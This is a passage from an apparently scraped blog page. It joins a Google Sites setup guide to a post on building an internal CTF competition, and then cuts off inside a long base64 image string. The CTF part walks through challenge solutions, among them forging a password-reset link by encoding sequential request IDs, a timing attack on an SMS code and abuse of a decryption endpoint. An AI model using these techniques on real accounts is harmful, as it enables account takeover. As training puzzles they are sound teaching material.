without color changes. If you want to embed Gist, you can only use Embed JavaScript (iframe), but Google Site does not handle it well. The height cannot change with page scaling, resulting in either too much blank space or two scroll bars on small mobile screens, which is very ugly and hard to read.1. Low Intrusiveness, only a floating exclamation mark at the bottom left that shows “Google Collaboration Platform Report Abuse” when clicked
2. Easy-to-use Interface, quickly create pages by dragging components on the right
Similar to wix/weebly or cakeresume? Just drag and fill in the components to complete the layout!
3. Supports RWD, built-in search, navigation bar
4. Supports Landing Page
5. No special traffic limits, capacity depends on the creator’s Google Drive limit
6. 🌟 Can bind to your own domain
7. 🌟 Can directly integrate GA for visitor analysis
8. Official Community collects feedback and continuously maintains updates
9. Supports announcement notifications
10. 🌟 Seamlessly embeds YouTube, Google Forms, Google Slides, Google Docs, Google Calendar, Google Maps, and supports RWD for desktop/mobile browsing
11. 🌟 Page content supports JavaScript/Html/CSS embedding
12. Clean and simple URLs (http://example.com/page-name/subpage-name), customizable page path names
13. 🌟 Page layout has reference lines/auto-alignment, very considerate
Reference alignment lines appear when dragging components
I think Google Site is only suitable for very lightweight web services, such as school clubs, small event websites, personal resumes.
List some problems I encountered and solved during use; everything else is WYSIWYG operations, nothing much to record.
1. Go to http://google.com/webmasters/verification 2. Click “ Add a property “ and enter “ Your domain “ then click “Continue”
3. Choose your “ Domain name provider “ and copy the “ DNS verification string “
4. Go to your domain name provider’s website (Here we use Namecheap.com as an example, others are similar)
In the DNS settings section, add a new record, select “ TXT Record “ as the type, enter “ @ “ as the host, and enter the DNS verification string you just copied as the value, then click add to submit.
Add another record, select “ CNAME Record “ as the type, enter “ www (or the subdomain you want to use) “ as the host, and enter “ ghs.googlehosted.com. “ as the value, then click add to submit.
Additionally, you can also redirect http://zhgchg.li -> http://www.zhgchg.li
After setting this up, you need to wait a bit… waiting for the DNS records to take effect…
5. Go back to Google Master and click verify
If you see “Verification failed” don’t worry! Please wait a bit longer, if it still doesn’t work after an hour, go back and check if there are any mistakes in the settings.
Successfully verified domain ownership
6. Go back to your Google Site settings page
Click the top right “ Gear (Settings) “ and select “ Custom URLs “, enter the domain name you want to assign, or the subdomain you want to use, and click “ Assign “.
After successfully assigning, close the settings window and click the top right “ Publish “ to publish.
Again, you need to wait a bit… waiting for the DNS records to take effect…
7. Open a new browser and enter the URL to see if it can be accessed normally
If you see “This site can’t be reached” don’t worry! Please wait a bit longer, if it still doesn’t work after an hour, go back and check if there are any mistakes in the settings.
Done!
Subpages will automatically gather and display in the navigation menu
How to set it up?
Switch to the “Pages” tab on the right.
You can add a page and drag it under an existing page to make it a subpage, or click “…” to operate.
Select properties to customize the page path.
Enter the path name (EX: dev -> http://www.zhgchg.li/dev)
1. Header Settings
Hover over the navigation bar and select “ Add Header “
After adding the header, hover over the bottom left corner to change the image, enter the title text, and change the header type.
2. Footer Settings
Hover over the bottom of the page and select “ Edit Footer “ to enter footer information.
Note! Footer information is shared across the entire site, and the same content will be applied to all pages!
You can also click the “eye” icon in the bottom left corner to control whether to display the footer information on this page.
favicon
Website Title, Logo
How to set it?
Click the “ Gear (Settings) “ in the top right corner and select “ Brand Images “ to set it. Don’t forget to go back to the page and click “ Publish “ for the changes to take effect!
Last Updated Information
Page Anchor Link Tips
How to set it?
Click the “ Gear (Settings) “ in the top right corner and select “ Viewer Tools “ to set it. Don’t forget to go back to the page and click “ Publish “ for the changes to take effect!
1. Go to https://analytics.google.com/analytics/web/?authuser=0#/provision/SignUp to create a new GA account
2. Copy the GA Tracking ID after creation
3. Return to your Google Site settings page
Click the “ Gear (Settings) “ in the top right corner and select “ Analytics “ to enter the “ GA Tracking ID “. Don’t forget to go back to the page and click “ Publish “ for the changes to take effect!
Banner Announcement
How to set it?
Click the “ Gear (Settings) “ in the top right corner and select “ Announcement Banner “ to set it. Don’t forget to go back to the page and click “ Publish “ for the changes to take effect!
You can specify the banner message content, color, button text, link to click, whether to open in a new tab, and set it to display site-wide or only on the homepage.
Top right “Publish ▾”
You can review changes and publish them.
You can set whether to allow search engines to index and disable the content review page before each publish.
Gist as an example
But as mentioned in the fatal flaw above, embedding an iframe cannot respond to the height according to the webpage size.
How to insert?
Select “Embed”
Choose embed code
You can enter JavaScript/HTML/CSS to create custom styled Button UI.
Additionally, selecting “Image” allows you to insert multiple images, which will be displayed in a waterfall flow (as seen on my City Corner page).
This is because the form contains a “ file upload “ item, which cannot be embedded in other pages using an iframe due to browser security issues; thus, it only shows the survey information and requires clicking the fill button to open a new window to complete the form.
The solution is to remove the file upload item, allowing the form to be filled out directly on the page.
EX: #lifesection, I want to place it at the top of the page for a table of contents or at the bottom for a GoTop button.
According to the official community, this is currently not possible. The button link can only 1. open an external link in a new window or 2. specify an internal page. Therefore, I later used subpages to split the directory.
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Building and brainstorming for Capture The Flag competitions
Capture The Flag, abbreviated as CTF, is a game originating from the West, commonly seen in paintball and first-person shooter games. The basic concept involves teams protecting their own flag while trying to capture the opponent’s flag. Applied to the field of computing, it becomes an “attack and defense” game where teams find and protect their vulnerabilities while attempting to exploit others to gain points.
The above describes a standard or even “advanced” CTF competition. However, running a CTF competition within a company involves additional practical considerations:
Considering these factors, rather than calling it a CTF competition, it is more like:
A team-based puzzle-solving event to accumulate flag points and promote interaction among engineers
This is an introductory-level CTF competition!
Items 3 and 4 are my personal additions. My expectation for this event is not just practical; I hope to enhance everyone’s enthusiasm for exploring and learning new things in a fun way, just like in daily work. We shouldn’t just be code monkeys but should strive for self-improvement and continuous progress!
After clarifying the event rules and goals, the next major task is how to create a CTF competition.
This part will be explained in two chapters: First, building a system to conduct the CTF competition, and Second, brainstorming competition questions.
This part requires knowledge of both front-end and back-end technologies. If you’re not familiar, you may need to ask colleagues for help.
Front-end: Semantic UI
Back-end: PHP + JSON files for data storage
Due to limited time, the competition system should be simple, stable, and quick to set up. The front-end interface uses the Semantic UI framework. The back-end is written in PHP without using a framework, and data is stored in JSON files instead of a database. This simplicity reduces potential issues (e.g., someone trying to hack the competition system to get answers).
Entry Page:
To make it fun, the entry page uses a reference from the BBC series Sherlock:
Phone unlock code S H E R
These four input boxes are for entering the team’s identification code (4 digits), e.g., Team 1: “1432”, Team 2: “8421”, to identify the team answering the questions.
As for the identification codes for each group, I have added a little twist. The identification codes are presented as follows:
Can you see the four-digit identification code? If not, please step back from the screen and take another look.
…….
……………
…………………
………………………
…………………………….
………………………………….
……………………………. .
……………………….
………………. .
…………
…….
. .
Answer: The identification code for the first group is 8291
After entering, you will be taken to the competition system homepage - the question list:
Top display: Team 1 group, remaining hint tickets
Middle question area: Question name, description, score for passing, lock time, purchase hints, hint display
Hovering the mouse will show time score, hint price
Bottom display: Total current score
Backend and other logic: The question list page will use Ajax to request the current answering status from the backend every second. The backend reads and records the answering status in the JSON file for each group. When unlocking a question, the time will be recorded. If the time has not arrived, other questions cannot be unlocked. When a question is answered correctly, the completion time, time score, and hint price will be written. The hint price will increase or decrease depending on the time spent.
The competition system is roughly like this, but the focus is not on the competition system, but on the questions themselves!
Whether it is interesting, whether everyone can participate, whether it has logic, whether it is novel… it is really hard to come up with
Let’s get to the point!
First, let me introduce the 5 questions I came up with
1. The Gate to the Magic Academy
Question description: You will get a string of keys and need to find a way to use this key to solve the spell and enter it in the spell input box. There is a captcha field below that needs to be entered. Click verify to answer the question.
Answer:
This question tests security and encoding issues. It involves the use of encryption and decryption vulnerabilities in the platform. If all encryption and decryption on the website use the same method and key, we can use this weakness to decrypt the content and obtain the original data!
You can see that the captcha part is ./image.php?token=AD0HbwdgVDw=
which provides a decryption interface. So we can try to input the encrypted key above:
You can get the decrypted string: LiveALifeYouWillRemember
Enter it into the spell input box to pass!
2. Please take me back to Shanghai in 1937!
Question description: You need to find a way to input the year/month/day and send it to the backend, making the backend recognize it as 1937. The year input range (1947~2099) cannot directly input 1937.
Answer:
This question is not about bypassing the frontend judgment because the backend handles it, so it cannot be bypassed. This question mainly tests the Year 2038 problem on 32-bit computers. Due to the bit limit, the 32-bit timestamp can only display up to January 19, 2038, 03:14:07. After that, it will overflow back to January 1, 1901. Therefore, by calculating backward, inputting 2073-02-06 to 2074-02-05
will fall in 1937. Inputting a date within this range will be successfully sent!
3. Catch Me If You Can
Problem Description: You need to find a way to receive a password reset email for a third-party email account (one you cannot log into) and complete the password reset for someone else.
Solution:
This problem requires more sensitivity. First, use an email account you can receive emails with to request a password reset; the email we receive is as follows:
1
+
Your password reset link: http://ctf.zhgchg.li/10/reset.php?requestid=OTk= If this is not related to you, please ignore this email, thank you!
+
We can see that the password reset request is identified through the requestid
parameter. The value we get is OTk=
, which looks like base64? Let’s try it:
We can get the value of the parameter as 99. Requesting a password reset again gives us 100, so we can infer that the password reset request is sequential. The next number is 101. At this point, go back to the email account you want to bypass and request a password reset. We can then forge a password reset link and secretly reset someone else’s password.
Encode 101 to Base64 => MTAx, forge the URL: http://ctf.zhgchg.li/10/reset.php?requestid=MTAx
, enter any password and click reset to pass!
4. Alias Master
Problem Description: You need to generate 10 sets of Gmail accounts (Gmail hosted mailboxes) to receive the answer email.
Solution:
This problem can certainly be brute-forced, but company emails cannot be registered at will; unless you find 10 people to help you receive emails, you cannot solve it.
The key to this problem is Gmail accounts/Gmail hosted mailboxes. Since company emails are Gmail hosted mailboxes, they also have the characteristics of Gmail accounts: you can use “.” and “+” to create unlimited alias accounts. “.” can be placed anywhere in the account, and “+” can be placed at the end followed by any number.
For example, the main email is zhgchgli@gmail.com
, but z.hgchgli@gmail.com, zh.gchgli@gmail, zhgchgli+1@gmail.com, zhgchgli+25@gmail.com… will all be sent to the main email zhgchgli@gmail.com
. One email can create multiple identities!
This problem mainly reminds everyone to filter out these characters when registering accounts to prevent malicious people from registering a large number of fake accounts.
After receiving 10 emails, you can combine them to find the URL of the answer. Enter the URL to pass!
5. Time Machine
Problem Description: Similar to Problem 3, you need to find a way to receive a 4-digit SMS verification code for a third-party phone number (one you cannot receive SMS for) and complete the login for someone else’s account.
Solution:
This problem is relatively obscure and difficult, mainly simulating a side-channel timing attack. The system login verification includes complex algorithms, and there will be a time difference when processing verification information (for example, if you enter one correct digit, it takes longer to process. If all are wrong, it returns immediately). By observing these time differences, we start from 0000
and try one digit at a time. When we try 2000
, it takes one second to process, so we know the first digit is 2
. Continue trying 2100
, still one second, 2200
takes even longer, two seconds… Continue trying the third and fourth digits, and finally, we get the answer 2256
.
This problem only simulates this type of attack. The backend processing directly uses sleep to simulate, not actually having complex algorithms. Generally, this type of attack is rarely encountered in web pages or apps; one reason is that the processing information is not complex enough to have a significant time difference, and another reason is the influence of network factors, making it difficult to judge.
For more details on side-channel attacks, you can refer to this article:
Understand CORB in 30 Minutes — Side-Channel Attacks
The above are the 5 questions I came up with. Below, I will continue to introduce the remaining 7 questions provided by my colleagues.
1. Sadako Appearance
Sadako image sourced from the internet
Question Description: The question is just a picture of Sadako. You need to enter what Sadako wants to say in the dialogue box above to pass.
Answer:
This question tests whether you know the concept of embedding other information in an image. The key lies in the original image:
Sadako image sourced from the internet
This image has secretly compressed a text file inside it (for the actual method, please refer to: How To Hide A ZIP File Inside An Image On Mac [Quicktip], note the Win/Mac issue here).
So we just need to simply unzip this image to get the passphrase:
Enter “YOUHAVENOIDEA” in the input box to pass!
Supplement:
Regarding hiding information in images, there is another method, using “ Steganography”
Steganography and Malware: Principles and Methods
In simple terms, it hides information by manipulating the color values of pixel color codes. The actual image has changed, but the naked eye cannot distinguish it.
This question also has hidden codes in the image to prevent people from going in this direction. Those who follow this path can get a hint:
Upload the image to an online steganography decoding tool to get the hint.
2. Caesar’s Morse Code
Image sourced from the internet
Question Description: Try to decipher the meaning of the Morse code provided in the question (a sentence in English).
Answer:
This question is quite straightforward. The first step is to decode the Morse code into English letters “ VYYXI DN HT GDAZ
“
Then perform Caesar cipher decryption. When we try a shift of 5, we get a meaningful English sentence “ addcn is my life”, which is the answer!
3. What do you think it is?
Opening this question’s webpage shows a bunch of garbled text, as follows:
1
+
data:image/png;base64,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